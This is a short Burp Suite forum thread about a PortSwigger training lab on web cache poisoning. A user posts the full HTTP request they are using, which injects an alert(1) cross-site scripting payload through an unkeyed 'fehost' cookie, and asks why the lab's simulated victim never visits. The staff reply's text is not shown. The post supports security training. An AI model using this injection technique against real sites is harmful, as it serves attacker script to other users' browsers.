The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

PortSwigger Lab: Web cache poisoning with an unkeyed cookie

Luke | Last updated: Feb 27, 2024 01:05PM UTC

Having the same issue with Webcache Poisoning - unkeyed cookie. Have managed to trigger the pop up on the site whenever a viewer loads homepage, but the automated user who is supposed to visit the site never does. Not sure if there is something wrong with my payload? I resend the payload every 25s, which is within the 30s timeout window. - - - - Payload: GET / HTTP/2 Host: 0a8600920336c1ba81d202dc00f7001d.web-security-academy.net Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i Cookie: session=91bXxXhkel77jGsDWF58KtsqVPZTOVGl; fehost=asdf%22%2dalert(1)%2d%22;

Dominyque, PortSwigger Agent | Last updated: Feb 27, 2024 02:01PM UTC